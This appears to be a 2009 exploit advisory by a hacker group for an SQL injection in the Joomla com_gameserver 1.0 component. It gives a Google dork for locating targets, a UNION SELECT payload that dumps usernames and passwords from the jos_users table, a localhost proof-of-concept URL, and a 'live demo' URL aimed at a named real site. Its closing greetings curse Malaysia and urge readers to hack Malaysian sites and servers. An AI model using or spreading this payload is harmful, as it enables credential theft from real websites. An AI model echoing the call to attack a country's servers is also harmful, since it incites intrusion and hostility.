************************************************************************* , . | | o | | |,---.,---., .,---.,---.,---.,---.,---|,---.,---.| .,---.|__/ `---'| || || |,---|| ,---|| | ||---'| | || || \ | `---'`---|`---|`---^`---'`---^` `---'`---'` `---'`` '` ` ` `---'`---' ************************************************************************* [o] Joomla Component com_gameserver 1.0 (id) SQL Injection Vulnerability --==[ Author ]==-- [+] Author : v3n0m [+] Contact : v3n0m666[at]live[dot]com [+] Blog : http://0wnage.wordpress.com/ [+] Group : YOGYACARDERLINK [+] Site : http://yogyacarderlink.web.id/ [+] Date : September, 03rd 2009 [INDONESIA] ************************************************************************* --==[ Details ]==-- [+] Software : Game Server Component [+] Version : 1.0 [+] Vendor : http://www.indianpulse.in/ [+] License : GPL [+] Vulnerable : SQL Injection [+] Google Dork : inurl:"com_gameserver" +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [-] Exploit: [+] 999999/**/and/**/1=2/**/union/**/select/**/group_concat(username,char(58),password)v3n0m/**/from/**/jos_users-- [-] SQLi p0c: [+] http://127.0.0.1/[path]/index.php?option=com_gameserver&view=gamepanel&id=999999/**/and/**/1=2/**/union/**/select/**/group_concat(username,char(58),password)v3n0m/**/from/**/jos_users-- [-] Demo Live: [+] http://www.jacker.ro/index.php?option=com_gameserver&view=gamepanel&id=999999/**/and/**/1=2/**/union/**/select/**/group_concat(username,char(58),password)v3n0m/**/from/**/jos_users-- +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Special Thanks => str0ke & milw0rm RedLine Crew => Bang Musa,Bang Yuan Rasugi Sang,Mas Andre,Dagol,Yazid => Ogie,Angga,Indah Boing,by-y0u Pletokan,Andrew YOGYACARDERLINK => lingah,leQhi,-Jali,Anak_Naga_,g0nz,IdioT_InsidE,aRiee => yoga0400,ghareng,eidelweiss,pKi,kaka11,z0mb13,Travis Eshan => & para gay yogyagaylink bruakakakakakakak Others => g0par Santiago,Don Tukulesto,mixbrainwasher => badkiddies,broken_hack,M364TR0N & ALL MOSLEM HACKERS Big Thanks => mywisdom [nice 0-day, you're 31337] => yadoy666 [Mari kita ganyang malingsianjink] => Angela Chang [kamu cantik,eksotis & mengerikan] (=^_^=) * Fuck to Malaysia <= the truly thief asia be carefull your culture art & song,island get stolen and claimed by them letz we hack they sites & servers !! PROUD TO BE INDONESIAN !! * 02:55am dreaming alone about future & my old story in my bedroom